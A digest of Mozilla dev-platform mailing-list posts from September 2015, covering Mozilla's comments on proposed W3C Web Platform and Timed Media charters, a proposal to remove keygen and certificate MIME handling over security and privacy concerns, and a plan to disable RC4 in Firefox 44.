Re: Proposed W3C Charters: Web Platform and Timed Media Working Groups

2015-09-11 Thread Anne van Kesteren
It seems the two hours are up, but I wanted to ask a question anyway.

On Fri, Sep 11, 2015 at 3:53 AM, L. David Baron  wrote:
> I'm still considering between two different endings:
>
> ...

Note that they are already actively ignoring the WHATWG.


> =
>
> One of the major problems in reaching interoperability for media
> standards has been patent licensing of lower-level standards covering
> many lower-level media technologies. ...

Was this included? Since you mentioned endings before you got to this.
This is also a problem of sorts with other work the W3C is doing,
where they charter work on high-level APIs without having sorted or
planning to sort out the protocol, e.g., the Presentation API.


-- 
https://annevankesteren.nl/
___
dev-platform mailing list
dev-platform@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-platform


Re: Proposed W3C Charters: Web Platform and Timed Media Working Groups

2015-09-11 Thread Jonas Sicking
On Thu, Sep 10, 2015 at 5:27 PM, Tantek Çelik  wrote:
>> On 09/10/2015 06:36 PM, Jonas Sicking wrote:
>> > If I am the only one that wants to put in a formal objection here,
>> > then I'll let it go and go with whatever everyone else think we
>> > should do.
>> >
>>
>> FWIW, I agree with Jonas that this is a terrible idea. (Even if we're
>> the only Member raising a formal objection,
>>
>
> I understand why it's not great, however, could you follow-up with specific
> reasons why it's "terrible"?

The HTML WG has historically has contained so much noise that next to
all productive contributors has left the group, leading to the being
unable to create almost any useful contributions to HTML5. This has
been such a big problem that the WGs future existence has been called
into question.

The WebApps WG is working very well and produce a large number of
highly successful and widely adopted specifications that has been very
good for the web.

The proposal here is to merge these two groups. I see no reason to
believe that the noise that exists in the HTML WG would not have the
same effect in this new WG.

I.e. the WebApps WG might become as unproductive as the HTML WG has been.

That would be terrible for the web.

/ Jonas
___
dev-platform mailing list
dev-platform@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-platform


Re: On the future of and application/x-x509-*-cert MIME handling

2015-09-11 Thread Martin Thomson
Awesome, thanks Ryan.

This cements my opinion on their fate.  These are not just old and
crufty, they are actively harmful.  They can't be removed soon enough.

I'm not fundamentally opposed to the notion of having some sort of
site control of client authentication in general, and maybe even TLS
client authentication specifically, but this feature[7] cannot
continue to exist as part of the web platform.

[7] By which I mean the certificate download and install part, keygen
seems to be more on the cruft side based on what I've seen.

On Fri, Sep 11, 2015 at 9:42 PM, Ryan Sleevi  wrote:
> [No idea if these will show up on the lists since I'm not subscribed]
>
> On Fri, Sep 11, 2015 at 9:30 PM, Martin Thomson  wrote:
>
>> I have some questions, to which I was unable to find answers for in
>> the (numerous and long) threads on this subject.
>>
>> 1. When we download and install a client cert, what checking do we do?
>>  Do we insist upon it meeting the same algorithm requirements we have
>> for servers with respect to use of things like short RSA keys and weak
>> hashes (MD5/SHA-1)?
>>
>
> No. These are client certs (generally for internal systems), for which
> there are no imposed policies on (CA/B Forum or otherwise).
>
> The only checking re: algorithms are those which NSS itself has not
> disabled globally (MD5, minimum keysizes, etc), but only if they present as
> parse errors - not as signature validation errors.
>
> If it comes in as application/x-x509-user-cert (vs, say,
> application/x-x509-ca-cert, which can be used to quickly add a root
> certificate),
> http://mxr.mozilla.org/mozilla-central/source/security/manager/ssl/nsNSSCertificateDB.cpp#849
> is what first parses/interprets the byte stream.
>
> The validation requires:
> 1) That the user has an existing private key (from any source,  or
> otherwise - so you can use this as an existence proof of whether or not a
> user has a matching key). That's line 886
> 2) That it's syntactically valid for one of the forms Mozilla accepts - or
> one of the ones it can munge into something it accepts (a liberal decoder)
> - that's line 875
>
> If so, it'll toast the user (via
> http://mxr.mozilla.org/mozilla-central/source/security/manager/ssl/nsNSSCertificateDB.cpp#810
> ) to let them know a certificate was installed (after the fact)
>
> It'll then parse the rest of the bundle, and if they are certificates that
> chain to a CA the user trusts, they'll also be imported (that's line 924)
>
>
> This behaviour, however, is different than Chrome's in several ways
> (primarily related to the parsing of the bundle and handling the additional
> certificates). Chrome also explored a number of strict checks (is it a
> valid client certificate from a known CA), but those had to be relaxed for
> compatability with Firefox and the existing use cases.
>
> We also explored not committing the generated key to the persistent
> keystore until it'd been "confirmed" (via installation of a certificate),
> except that broke nearly every  use case outside of WebID. In
> particular, if you closed Chrome, we'd destroy the key - so that didn't
> work for situations where you'd do a  enrollment, close Chrome, a
> day later getting an email with a link from your CA w/ the certificate. So
> you'd need some form of semi-persistent, origin-scoped storage if you went
> that way.
>
>
>>
>> 2. What is the potential scope of use for a client certificate?
>> Global?  The origin that provided it?  Something in-between like
>> domain or domain plus subdomains?
>>
>
> Global - all domains, all applications. A common pattern, as seen on the
> CA/Browser Forum list, is to use this method to configure S/MIME
> certificates for Thunderbird, which uses the same NSS database.
>
> Any other domain could do an existence test to see if a user has such a
> certificate, by using  to create a key (which may or may not
> involve prompting; various criteria there), using
> application/x-x509-user-cert to deliver the user's cert that matches a
> chosen ("attacker") issuer string, and then doing a TLS handshake that
> requests a client certificate with the ca_names set to the attacker's
> unique fingerprint.
>
> The timing difference between the handshakes - whether or not the user has
> a matching certificate and private key - can reveal to any domain who knows
> the ca_names whether or not the user matches, at the cost of potentially
> prompting the user (if they do match).
> ___
> dev-security mailing list
> dev-secur...@lists.mozilla.org
> https://lists.mozilla.org/listinfo/dev-security
___
dev-platform mailing list
dev-platform@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-platform


Re: On the future of and application/x-x509-*-cert MIME handling

2015-09-11 Thread Martin Thomson
I have some questions, to which I was unable to find answers for in
the (numerous and long) threads on this subject.

1. When we download and install a client cert, what checking do we do?
 Do we insist upon it meeting the same algorithm requirements we have
for servers with respect to use of things like short RSA keys and weak
hashes (MD5/SHA-1)?

2. What is the potential scope of use for a client certificate?
Global?  The origin that provided it?  Something in-between like
domain or domain plus subdomains?

I'll go and dig around in the code if I have to, but if someone has
the answers readily available, or wants to do the rummaging for me,
that would be much appreciated.

On Wed, Jul 29, 2015 at 4:35 PM, David Keeler  wrote:
> [cc'd to dev-security for visibility. This discussion is intended to
> happen on dev-platform; please reply to that list.]
>
> Ryan Sleevi recently announced the pre-intention to deprecate and
> eventually remove support for the  element and special-case
> handling of the application/x-x509-*-cert MIME types from the blink
> platform (i.e. Chrome).
>
> Rather than reiterate his detailed analysis, I'll refer to the post here:
>
> https://groups.google.com/a/chromium.org/d/msg/blink-dev/pX5NbX0Xack/kmHsyMGJZAMJ
>
> Much, if not all, of that reasoning applies to gecko as well.
> Furthermore, it would be a considerable architectural improvement if
> gecko were to remove these features (particularly with respect to e10s).
> Additionally, if they were removed from blink, the compatibility impact
> of removing them from gecko would be lessened.
>
> I therefore propose we follow suit and begin the process of deprecating
> and removing these features. The intention of this post is to begin a
> discussion to determine the feasibility of doing so.
>
> Cheers,
> David
>
>
> ___
> dev-security mailing list
> dev-secur...@lists.mozilla.org
> https://lists.mozilla.org/listinfo/dev-security
>
___
dev-platform mailing list
dev-platform@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-platform


Re: Proposed W3C Charters: Web Platform and Timed Media Working Groups

2015-09-11 Thread smaug

On 09/11/2015 04:53 AM, L. David Baron wrote:

On Tuesday 2015-09-08 17:33 -0700, Tantek Çelik wrote:

Follow-up on this, since we now have two days remaining to respond to these
proposed charters.

If you still have strong opinions about the proposed Web Platform and Timed
Media Working Groups charters, please reply within 24 hours so we have the
opportunity to integrate your opinions into Mozilla's response to these
charters.


Here are the comments I have so far (Web Platform charter first,
then timed media).

The deadline for comments is in about 2 hours.  I'll submit these
tentatively, but can revise if I get feedback quickly.  (Sorry for
not gathering them sooner.)

-David

=

We are very concerned that the merger of HTML work into the functional
WebApps group might harm the ability of the work happening in WebApps to
continue to make progress as well as it currently does.  While a number
of people within Mozilla think we should formally object to this merger
because of the risk to work within WebApps, I am not making this a
formal objection.  However, I think the proper functioning of this group
needs to be carefully monitored, and the consortium needs to be prepared
to make changes quickly if problems occur.  And I think it would be
helpful if the HTML and WebApps mailing lists are *not* merged.



This sounds good to me.
After chatting with MikeSmith and ArtB I'm not so worried about the merge 
anymore.
(Apparently merge is a bit too strong word here even, it is more like taking 
the specification to the
WebApps WG, but trying to not take the rest of the baggage from HTML WG.)


-Olli




A charter that is working on many documents that are primarily developed
at the WHATWG should explicitly mention the WHATWG.  It should explain
how the relationship works, including satisfactorily explaining how
W3C's work on specifications that are rapidly evolving at the WHATWG
will not harm interoperability (presuming that the W3C work isn't just
completely ignored).

In particular, this concerns the following items of chartered work:
   * Quota Management API
   * Web Storage (2nd Edition)
   * DOM4
   * HTML
   * HTML Canvas 2D Context
   * Web Sockets API
   * XHR Level 1
   * Fetching resources
   * Streams API
   * URL
   * Web Workers
and the following items in the specification maintenance section:
   * CORS
   * DOM specifications
   * HTML 5.0
   * Progress Events
   * Server-sent Events
   * Web Storage
   * Web Messaging

One possible approach to this problem would be to duplicate the
technical work happening elsewhere on fewer or none of these
specifications.  However, given that I don't expect that to happen, the
charter still needs to explain the relationship between the technical
work happening at the WHATWG and the technical work (if any) happening
at the W3C.


The group should not be chartered to modularize the entire HTML
specification.  While specific documents that have value in being
separated, active editorship, and implementation interest are worth
separating, chartering a group to do full modularization of the HTML
specification feels both like busywork and like chartering work that is
too speculative and not properly incubated.  It also seems like it will
be harmful to interoperability since it proposes to modularize a
specification whose primary source is maintained elsewhere, at the
WHATWG.


The charter should not include work on HTML Imports.  We don't plan to
implement it for the reasons described in
https://hacks.mozilla.org/2014/12/mozilla-and-web-components/
and believe that it will no longer be needed when JavaScript modules are
available.


The inclusion of "Robust Anchoring API" in the charter is suspicious
given that we haven't heard of it before.  It should probably be in an
incubation process before being a chartered work item.


We also don't think the working group should be chartered to work
on any items related to "Widgets"; this technology is no longer used.



I'm still considering between two different endings:

OPTION 1:

Note that while this response is not a formal objection, many of these
issues are serious concerns and we hope they will be properly
considered.

OPTION 2:

The only part of this response that constitutes a formal objection is
having a reasonable explanation of the relationship between the working
group and the work happening at the WHATWG (rather than ignoring the
existence of the WHATWG).  However, many of the other issues issues
raised are serious concerns and we hope they will be properly
considered.

=

One of the major problems in reaching interoperability for media
standards has been patent licensing of lower-level standards covering
many lower-level media technologies.  The W3C's Patent Policy only helps
with technology that the W3C develops, and not technology that it
references.  Given that, this group's charter should explicitly prefer
referencing technology that can be implemented and used without paying
royalties and 

Re: Intent to ship: RC4 disabled by default in Firefox 44

2015-09-11 Thread Richard Barnes
Hearing no objections, let's consider this the plan of record.

Thanks,
--Richard

On Tue, Sep 1, 2015 at 12:56 PM, Richard Barnes  wrote:

> For a while now, we have been progressively disabling the known-insecure
> RC4 cipher [0].  The security team has been discussing with other the
> browser vendors when to turn off RC4 entirely, and there seems to be
> agreement to take that action in late January / early February 2016,
> following the release schedules of the various browsers.  For Firefox, that
> means version 44, currently scheduled for release on Jan 26.
>
> More details below.
>
>
> # Current status
>
> Since Firefox 37, RC4 has been partly disabled in Firefox.  It still works
> in Beta and Release, but in Nightly and Aurora, it is allowed only for a
> static whitelist of hosts [1][2].  Note that the whitelist is not
> systematic; it was mainly built from compatibility bugs.
>
> RC4 support is controlled by three preferences:
>
> * security.tls.unrestricted_rc4_fallback - Allows use of RC4 with no
> restrictions
> * security.tls.insecure_fallback_hosts.use_static_list - Allow RC4 for
> hosts on the static whitelist
> * security.tls.insecure_fallback_hosts - A list of hosts for which RC4 is
> allowed (empty by default)
>
>
> # Proposal
>
> The proposed plan is to gradually reduce RC4 support by making the default
> values of these preferences more restrictive:
>
> * 42/ASAP: Disable whitelist in Nightly/Aurora; no change in Beta/Release
> * 43: Disable unrestricted fallback in Beta/Release (thus allowing RC4
> only for whitelisted hosts)
> * 44: Disable all RC4 prefs by default, in all releases
>
> That is, as of Firefox 44, RC4 will be entirely disabled unless a user
> explicitly enables it through one of the prefs.
>
>
> # Compatibility impact
>
> Disabling RC4 will mean that Firefox will no longer connect to servers
> that require RC4.  The data we have indicate that while there are still a
> small number of such servers, Firefox users encounter them at very low
> rates.
>
> Telemetry indicates that in the Beta and Release populations, which have
> no restrictions on RC4 usage, RC4 is used for around 0.08% for Release and
> around 0.05%  for Beta [3][4].  For Nightly and Aurora, which are
> restricted to the whitelist, the figure is more like 0.025% [5].  These
> numbers are small enough that the histogram viewer on
> telemetry.mozilla.org won't show them (that's why the below references
> are to my own telemetry timeline tool, rather than telemetry.mozilla.org).
>
> That said, there is a small but measurable population of servers out there
> that require RC4.  Scans by Mozilla QA team find that with current Aurora
> (whitelist enabled), around 0.41% of their test set require RC4, 820 sites
> out of 211k.  Disabling the whitelist only results in a further 26 sites
> broken, totaling 0.4% of sites.  I have heard some rumors about there being
> a higher prevalence of RC4 among enterprise sites, but have no data to
> support this.
>
> Users can still enable RC4 in any case by changing the above prefs, either
> by turning on RC4 in general or by  adding specific hosts to the
> "insecure_fallback_hosts" whitelist.  The security and UX teams are
> discussing possibilities for UI that would automate whitelisting of sites
> for users.
>
> [0] https://tools.ietf.org/html/rfc7465
> [1] https://bugzilla.mozilla.org/show_bug.cgi?id=1128227
> [2]
> https://dxr.mozilla.org/mozilla-central/source/security/manager/ssl/IntolerantFallbackList.inc
> [3]
> https://ipv.sx/telemetry/general-v2.html?channels=release=SSL_SYMMETRIC_CIPHER_FULL=1
> [4]
> https://ipv.sx/telemetry/general-v2.html?channels=beta=SSL_SYMMETRIC_CIPHER_FULL=1
> [5]
> https://ipv.sx/telemetry/general-v2.html?channels=nightly%20aurora=SSL_SYMMETRIC_CIPHER_FULL=1
>
___
dev-platform mailing list
dev-platform@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-platform


Re: Proposed W3C Charters: Web Platform and Timed Media Working Groups

2015-09-11 Thread L. David Baron
On Friday 2015-09-11 09:43 +0200, Anne van Kesteren wrote:
> It seems the two hours are up, but I wanted to ask a question anyway.
> 
> On Fri, Sep 11, 2015 at 3:53 AM, L. David Baron  wrote:
> > I'm still considering between two different endings:
> >
> > ...
> 
> Note that they are already actively ignoring the WHATWG.

I used:

  # The only part of this response that constitutes a formal objection is
  # having a reasonable explanation of the relationship between the working
  # group and the work happening at the WHATWG (rather than nearly ignoring
  # the existence of the WHATWG).  However, many of the other issues issues
  # raised are serious concerns and we hope they will be properly
  # considered.

> > =
> >
> > One of the major problems in reaching interoperability for media
> > standards has been patent licensing of lower-level standards covering
> > many lower-level media technologies. ...
> 
> Was this included? Since you mentioned endings before you got to this.
> This is also a problem of sorts with other work the W3C is doing,
> where they charter work on high-level APIs without having sorted or
> planning to sort out the protocol, e.g., the Presentation API.

Yes.  Those were the comments on the timed media charter, though.

-David

-- 
턞   L. David Baron http://dbaron.org/   턂
턢   Mozilla  https://www.mozilla.org/   턂
 Before I built a wall I'd ask to know
 What I was walling in or walling out,
 And to whom I was like to give offense.
   - Robert Frost, Mending Wall (1914)


signature.asc
Description: Digital signature
___
dev-platform mailing list
dev-platform@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-platform


Re: Proposed W3C Charters: Web Platform and Timed Media Working Groups

2015-09-11 Thread L. David Baron
On Friday 2015-09-11 00:46 -0700, Jonas Sicking wrote:
> The HTML WG has historically has contained so much noise that next to
> all productive contributors has left the group, leading to the being
> unable to create almost any useful contributions to HTML5. This has
> been such a big problem that the WGs future existence has been called
> into question.
> 
> The WebApps WG is working very well and produce a large number of
> highly successful and widely adopted specifications that has been very
> good for the web.
> 
> The proposal here is to merge these two groups. I see no reason to
> believe that the noise that exists in the HTML WG would not have the
> same effect in this new WG.
> 
> I.e. the WebApps WG might become as unproductive as the HTML WG has been.
> 
> That would be terrible for the web.

I think the risk here is lower than you think because neither the
process, nor the chairs, nor the bulk of the members (the public
invited experts) of the HTML WG are being merged.  And I think
others are aware of the risks, and willing to stop bad actors.

-David

-- 
턞   L. David Baron http://dbaron.org/   턂
턢   Mozilla  https://www.mozilla.org/   턂
 Before I built a wall I'd ask to know
 What I was walling in or walling out,
 And to whom I was like to give offense.
   - Robert Frost, Mending Wall (1914)


signature.asc
Description: Digital signature
___
dev-platform mailing list
dev-platform@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-platform